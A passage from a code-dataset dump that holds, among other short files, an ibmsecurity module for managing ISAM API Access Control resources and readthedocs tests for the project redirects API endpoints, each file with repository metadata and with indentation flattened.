'alias1, alias2', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'PATCH'
assert (
data['body'] == {'hostIP': 'ip1', 'hostAliases':["alias1", "alias2"]}
)
# Check the response from server ... no mock available
# === examples/aditi/sarkar/admin.py (repo: navycut/navycut, license: MIT) ===
from navycut.contrib.admin import admin
from .models import *
admin.register_model(Band)
# === 4_advanced/ai-py-injection-factory/tests/support/solvers/__init__.py (repo: grecoe/teals, license: MIT) ===
from .testsolver import DummySolver
# === pyN/Populations/__init__.py (repo: ericjang/pyN, license: BSD-2-Clause) ===
from pyN.Populations.IzhikevichPopulation import *
from pyN.Populations.AdExPopulation import *
#Hodgkin-Huxley Populations not quite working yet.
#from HHPopulation import *
# === nilmtk/disaggregate/__init__.py (repo: pilillo/nilmtk, license: Apache-2.0) ===
from .combinatorial_optimisation import CombinatorialOptimisation
# === mlbench/__init__.py (repo: jacxhanx/mlbench, license: MIT) ===
# import mlbench.data
# import mlbench.train
# === topicnet/cooking_machine/__init__.py (repo: bt2901/TopicNet, license: MIT) ===
from .dataset import Dataset
from .dataset import BaseDataset
from .experiment import Experiment
from .model_constructor import *
from .dataset_cooc import DatasetCooc
188b3a1bac708a8619ebef86cc81287d08aa4798 | 28,778 | py | Python | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 46 | 2017-03-21T21:08:59.000Z | 2022-02-20T22:03:46.000Z | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 201 | 2017-03-21T21:25:52.000Z | 2022-03-30T21:38:20.000Z | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 91 | 2017-03-22T16:25:36.000Z | 2022-02-04T04:36:29.000Z | import logging
import os
import ibmsecurity
from ibmsecurity.utilities import tools
logger = logging.getLogger(__name__)
uri = "/wga/apiac/resource/instance"
requires_modules = ["wga"]
requires_version = "9.0.7"
def get_all(isamAppliance, instance_name, resource_server_name, check_mode=False, force=False):
"""
Retrieve a list of all API Access Control Resources
"""
return isamAppliance.invoke_get("Retrieve a list of all API Access Control Resources",
"{0}/{1}/server{2}/resource".format(uri, instance_name, resource_server_name),
requires_modules=requires_modules, requires_version=requires_version)
def get(isamAppliance, instance_name, resource_server_name, resource_name, method,
server_type="standard", check_mode=False, force=False):
"""
Retrieve a single API Access Control Resource
"""
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name, resource_server_name,
method, resource_name, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name, resource_server_name,
method, resource_name, server_type)
return isamAppliance.invoke_get("Retrieve a single API Access Control Resource",
url, requires_modules=requires_modules, requires_version=requires_version)
def add(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
"""
Creating a new API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'method': method,
'policy': policy,
'server_type': server_type,
'cors_policy': cors_policy,
'static_response_headers': static_response_headers,
'url_aliases': url_aliases
}
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
json_data['path'] = path
else:
json_data['path'] = "{0}{1}".format(resource_server_name, path)
if name is not None:
json_data['name'] = name
if rate_limiting_policy is not None:
json_data['rate_limiting_policy'] = rate_limiting_policy
if documentation is not None:
json_data['documentation'] = documentation
return isamAppliance.invoke_post(
"Creating a new API Access Control Resource",
"{0}/{1}/server{2}/resource".format(uri, instance_name, resource_server_name),
json_data, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def update(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
"""
Updating an existing API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
else:
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name,
method, path)
if resource_exist is False:
warnings.append("The specified resource does not exist")
return isamAppliance.create_return_object(warnings=warnings)
update_required, warnings, json_data = _check_resource_content(isamAppliance=isamAppliance,
instance_name=instance_name,
resource_server_name=resource_server_name,
method=method, path=path, policy=policy,
cors_policy=cors_policy, name=name,
static_response_headers=static_response_headers,
rate_limiting_policy=rate_limiting_policy,
url_aliases=url_aliases, documentation=documentation)
if force is True or update_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
return isamAppliance.invoke_put(
"Updating an existing API Access Control Resource",
url, json_data, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def set(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
    """
    Create a new API Access Control Resource, or update it if it already exists
    """
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name,
method, path)
if resource_exist is True:
return update(isamAppliance=isamAppliance, instance_name=instance_name,
resource_server_name=resource_server_name, method=method, path=path, policy=policy,
server_type=server_type, cors_policy=cors_policy, static_response_headers=static_response_headers,
url_aliases=url_aliases, name=name, rate_limiting_policy=rate_limiting_policy,
documentation=documentation, check_mode=check_mode, force=force)
else:
return add(isamAppliance=isamAppliance, instance_name=instance_name,
resource_server_name=resource_server_name, method=method, path=path, policy=policy,
server_type=server_type, cors_policy=cors_policy, static_response_headers=static_response_headers,
url_aliases=url_aliases, name=name, rate_limiting_policy=rate_limiting_policy,
documentation=documentation, check_mode=check_mode, force=force)
def delete(isamAppliance, instance_name, resource_server_name, method, path, server_type='standard',
check_mode=False, force=False):
"""
Delete an existing API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
return isamAppliance.invoke_delete(
"Delete an existing API Access Control Resource",
url,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def delete_selection(isamAppliance, instance_name, resource_server_name, resources, command="DELETE",
server_type="standard", check_mode=False, force=False):
"""
Delete a selection of API Access Control Resources
"""
found_any = False
new_list_resources = []
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
for resource in resources:
found = False
for obj in ret_obj['data']:
if obj['id'] == resource:
found = True
found_any = True
if found is False:
warnings.append("Did not find resource {0} to delete".format(resource))
else:
new_list_resources.append(resource)
if force is True or found_any is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put(
"Delete a selection of API Access Control Resources",
"{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name, resource_server_name,
server_type),
{
'command': command,
'resources': new_list_resources
},
requires_modules=requires_modules,
requires_version=requires_version, warnings=warnings)
return isamAppliance.create_return_object(warnings=warnings)
def delete_all(isamAppliance, instance_name, resource_server_name, server_type='standard',
check_mode=False, force=False):
"""
Delete all existing API Access Control Resources
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_all_resource(isamAppliance, instance_name, resource_server_name)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Delete all existing API Access Control Resources",
"{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name, resource_server_name,
server_type),
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def export_all(isamAppliance, instance_name, resource_server_name, file_path, check_mode=False, force=False):
"""
Exporting all existing API Access Control Resources
"""
if os.path.exists(file_path) is True:
warn_str = "File {0} already exists".format(file_path)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
if force is True or server_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
url = "{0}/{1}/server{2}/resource?export=true".format(uri, instance_name, resource_server_name)
return isamAppliance.invoke_get_file(
"Exporting all existing API Access Control Resources",
url,
file_path,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def export_file(isamAppliance, instance_name, resource_server_name, method, path, file_path,
server_type="standard", check_mode=False, force=False):
"""
Exporting an existing API Access Control Resource
"""
if os.path.exists(file_path) is True:
warn_str = "File {0} already exists".format(file_path)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?export=true&server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?export=true&server_type={5}".format(uri, instance_name,
resource_server_name,
method, path,
server_type)
return isamAppliance.invoke_get_file(
"Exporting an existing API Access Control Resource",
url,
file_path,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def import_file(isamAppliance, instance_name, resource_server_name, filename,
server_type="standard", check_mode=False, force=False):
"""
Importing an API Access Control Resource(s)
"""
if os.path.exists(filename) is False:
        warn_str = "File {0} does not exist".format(filename)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
if force is True or server_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
url = "{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name,
resource_server_name, server_type)
return isamAppliance.invoke_post_files(
"Importing an API Access Control Resource(s)", url,
[
{
'file_formfield': 'config_file',
'filename': filename,
'mimetype': 'application/octet-stream'
}
],
{}, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def _check_instance_exist(isamAppliance, instance_name):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance)
for obj in ret_obj['data']:
if obj['name'] == instance_name:
return True, ret_obj['warnings']
return False, ret_obj['warnings']
def _check_server_exist(isamAppliance, instance_name, junction_point):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance, instance_name)
for obj in ret_obj['data']:
if obj['name'] == junction_point:
return True, ret_obj['warnings']
return False, ret_obj['warnings']
def _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
path_name = path
else:
path_name = "{0}{1}".format(resource_server_name, path)
for obj in ret_obj['data']:
if obj['method'] == method and obj['path'] == path_name:
return True, warnings
return False, warnings
def _check_all_resource(isamAppliance, instance_name, resource_server_name):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
if ret_obj['data'] != []:
return True, warnings
else:
return False, warnings
def _check_all_servers(isamAppliance, instance_name):
ret_obj = ibmsecurity.isam.web.api_access_control.servers.get_all(isamAppliance, instance_name)
warnings = ret_obj['warnings']
if ret_obj['data'] != []:
return True, warnings
else:
return False, warnings
def _check_list_resource(isamAppliance, instance_name, resource_server_name, resources):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
non_exist = False
for resource in resources:
found = False
for obj in ret_obj['data']:
if obj['id'] == resource:
found = True
if found is False:
non_exist = True
warnings.append("Did not find resource {0}".format(resource))
if non_exist is False:
return True, ret_obj['warnings']
else:
return False, warnings
def _check_list_servers(isamAppliance, instance_name, resource_servers):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance, instance_name)
warnings = ret_obj['warnings']
non_exist = False
for server in resource_servers:
found = False
for obj in ret_obj['data']:
if obj['name'] == server:
found = True
if found is False:
non_exist = True
warnings.append("Did not find resource server {0}".format(server))
if non_exist is False:
return True, ret_obj['warnings']
else:
return False, warnings
def _check_resource_content(isamAppliance, instance_name, resource_server_name, method, path, policy,
cors_policy, static_response_headers, url_aliases, name, rate_limiting_policy,
documentation):
ret_obj = get(isamAppliance, instance_name, resource_server_name, path, method)
current_data = ret_obj['data']
del current_data['id']
json_data = {
'method': method,
'policy': policy,
'cors_policy': cors_policy,
'static_response_headers': static_response_headers,
'url_aliases': url_aliases
}
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
json_data['path'] = path
else:
json_data['path'] = "{0}{1}".format(resource_server_name, path)
if name is not None:
json_data['name'] = name
if rate_limiting_policy is not None:
json_data['rate_limiting_policy'] = rate_limiting_policy
if documentation is not None:
json_data['documentation'] = documentation
sorted_obj1 = tools.json_sort(json_data)
logger.debug("Sorted sorted_obj1: {0}".format(sorted_obj1))
sorted_obj2 = tools.json_sort(current_data)
logger.debug("Sorted sorted_obj2: {0}".format(sorted_obj2))
if sorted_obj1 != sorted_obj2:
logger.info("Changes detected, update needed.")
return True, ret_obj['warnings'], json_data
return False, ret_obj['warnings'], json_data
def compare_one_server(isamAppliance1, isamAppliance2, instance1_name, server1_name, instance2_name=None,
server2_name=None):
"""
Compare resources between two appliances
"""
if instance2_name is None or instance2_name == '':
instance2_name = instance1_name
if server2_name is None or server2_name == '':
server2_name = server1_name
resources1 = get_all(isamAppliance1, instance_name=instance1_name, resource_server_name=server1_name)
resources2 = get_all(isamAppliance2, instance_name=instance2_name, resource_server_name=server2_name)
return tools.json_compare(resources1, resources2)
def compare(isamAppliance1, isamAppliance2):
"""
Compare resources between two appliances
"""
app1_instances = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance1)
app2_instances = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance2)
obj1 = []
obj2 = []
for inst1 in app1_instances['data']:
servers = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance1,
instance_name=inst1['name'])
for srv in servers['data']:
if "servers" in srv:
srvlist = srv['servers'].split(";")
new_str = None
for value in srvlist:
if value.find("server_uuid") == -1 and \
value.find("current_requests") == -1 and \
value.find("total_requests") == -1:
if new_str is None:
new_str = value
else:
new_str = new_str + ";" + value
srv['servers'] = new_str
obj1.append(srv)
resources1 = get_all(isamAppliance1, instance_name=inst1['name'], resource_server_name=srv['name'])
obj1.extend(resources1['data'])
for inst2 in app2_instances['data']:
servers = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance2,
instance_name=inst2['name'])
for srv in servers['data']:
if "servers" in srv:
srvlist = srv['servers'].split(";")
new_str = None
for value in srvlist:
if value.find("server_uuid") == -1 and \
value.find("current_requests") == -1 and \
value.find("total_requests") == -1:
if new_str is None:
new_str = value
else:
new_str = new_str + ";" + value
srv['servers'] = new_str
obj2.append(srv)
resources2 = get_all(isamAppliance2, instance_name=inst2['name'], resource_server_name=srv['name'])
obj2.extend(resources2['data'])
app1_instances['data'].extend(obj1)
app2_instances['data'].extend(obj2)
return tools.json_compare(app1_instances, app2_instances,
deleted_keys=['server_uuid', 'current_requests', 'total_requests'])
| 46.11859 | 120 | 0.613211 | 3,077 | 28,778 | 5.467013 | 0.054924 | 0.059922 | 0.073832 | 0.075853 | 0.88628 | 0.871359 | 0.839555 | 0.775294 | 0.749554 | 0.707407 | 0 | 0.01024 | 0.304364 | 28,778 | 623 | 121 | 46.192616 | 0.830061 | 0.019598 | 0 | 0.690678 | 0 | 0.010593 | 0.101666 | 0.026469 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044492 | false | 0 | 0.012712 | 0 | 0.197034 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
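Throughout the module above, the resource URL is built with `str.format`, and on ISAM 10.0.0+ the junction name is repeated inside the path by reusing the positional index `{2}`. A minimal stand-alone sketch of that version-gated URL construction (the `version_tuple` helper is a simplified stand-in for `tools.version_compare`, not the ibmsecurity implementation):

```python
# Sketch of the version-dependent resource URL shape. On 10.0.0 and later the
# junction point ({2}) is repeated before the resource path, matching the
# `"{0}/{1}/server{2}/resource/{3}{2}{4}"` format strings in the module.
URI = "/wga/apiac/resource/instance"

def version_tuple(v):
    # Crude numeric parse, e.g. "9.0.7" -> (9, 0, 7); stand-in for version_compare.
    return tuple(int(p) for p in v.split("."))

def resource_url(version, instance, junction, method, path, server_type="standard"):
    if version_tuple(version) < version_tuple("10.0.0"):
        return "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(
            URI, instance, junction, method, path, server_type)
    # 10.0.0+: junction name repeated inside the path segment
    return "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(
        URI, instance, junction, method, path, server_type)

print(resource_url("9.0.7", "inst1", "/api", "GET", "/users"))
# -> /wga/apiac/resource/instance/inst1/server/api/resource/GET/users?server_type=standard
print(resource_url("10.0.0", "inst1", "/api", "GET", "/users"))
# -> /wga/apiac/resource/instance/inst1/server/api/resource/GET/api/users?server_type=standard
```

Note the junction names begin with `/`, which is why the format strings need no separator between `server` and `{2}` or between `{3}` and `{2}`.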
e14f485e64e28de530d378160c4a49e514c1db07 | 5,206 | py | Python | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 19 | 2018-03-28T12:28:35.000Z | 2022-02-14T20:09:42.000Z | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 274 | 2017-10-10T07:59:04.000Z | 2022-03-12T00:56:03.000Z | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 13 | 2018-04-03T09:49:50.000Z | 2021-04-18T22:04:15.000Z | from .mixins import APIEndpointMixin
from django.urls import reverse
class RedirectsEndpointTests(APIEndpointMixin):
def test_unauthed_projects_redirects_list(self):
response = self.client.get(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
)
self.assertEqual(response.status_code, 401)
def test_projects_redirects_list(self):
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.get(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-list'),
)
def test_unauthed_projects_redirects_detail(self):
response = self.client.get(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 401)
def test_projects_redirects_detail(self):
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.get(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-detail'),
)
def test_unauthed_projects_redirects_list_post(self):
data = {}
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.others_project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 401)
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.others_project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 403)
def test_projects_redirects_list_post(self):
data = {
'from_url': '/page/',
'to_url': '/another/',
'type': 'page',
}
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 201)
response_json = response.json()
response_json['created'] = '2019-04-29T10:00:00Z'
response_json['modified'] = '2019-04-29T12:00:00Z'
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-list_POST'),
)
def test_projects_redirects_detail_put(self):
data = {
'from_url': '/changed/',
'to_url': '/toanother/',
'type': 'page',
}
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.put(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
data,
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
response_json['modified'] = '2019-04-29T12:00:00Z'
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-detail_PUT'),
)
def test_projects_redirects_detail_delete(self):
self.assertEqual(self.project.redirects.count(), 1)
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.delete(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 204)
self.assertEqual(self.project.redirects.count(), 0)
| 32.335404 | 77 | 0.541299 | 470 | 5,206 | 5.746809 | 0.142553 | 0.132173 | 0.085524 | 0.083302 | 0.914846 | 0.874491 | 0.785635 | 0.785635 | 0.768974 | 0.768974 | 0 | 0.021125 | 0.354399 | 5,206 | 160 | 78 | 32.5375 | 0.782505 | 0 | 0 | 0.633803 | 0 | 0 | 0.17307 | 0.108144 | 0 | 0 | 0 | 0 | 0.105634 | 1 | 0.056338 | false | 0 | 0.014085 | 0 | 0.077465 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
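The redirect tests above pin volatile server-generated fields (`created`, `modified`) to fixed sentinels before calling `assertDictEqual` against a stored fixture. A minimal plain-Python sketch of that normalize-then-compare pattern (the real tests use DRF's test client; field names here just mirror the tests):

```python
# Volatile timestamp fields are overwritten with fixed sentinels before the
# dict comparison, so the stored expected response stays stable across runs.
VOLATILE_FIELDS = {
    "created": "2019-04-29T10:00:00Z",
    "modified": "2019-04-29T12:00:00Z",
}

def normalize(response_json):
    """Return a copy with volatile timestamp fields pinned to sentinels."""
    pinned = dict(response_json)
    for field, sentinel in VOLATILE_FIELDS.items():
        if field in pinned:
            pinned[field] = sentinel
    return pinned

live = {"from_url": "/page/", "to_url": "/another/",
        "created": "2021-07-01T09:13:27Z", "modified": "2021-07-01T09:13:27Z"}
expected = {"from_url": "/page/", "to_url": "/another/",
            "created": "2019-04-29T10:00:00Z", "modified": "2019-04-29T12:00:00Z"}

assert normalize(live) == expected
```

Compared with deleting the fields outright, pinning keeps the fixture shape complete, so a missing timestamp in the response still fails the comparison.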
e15672d34f20b21097c3daf9ea7c6b94f34bbebc | 27 | py | Python | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | from .core import topickle
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1599dd2c00fa4e164af2099ca23f8bee206ad79 | 30 | py | Python | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | from kurac.kurac import kurac
| 15 | 29 | 0.833333 | 5 | 30 | 5 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
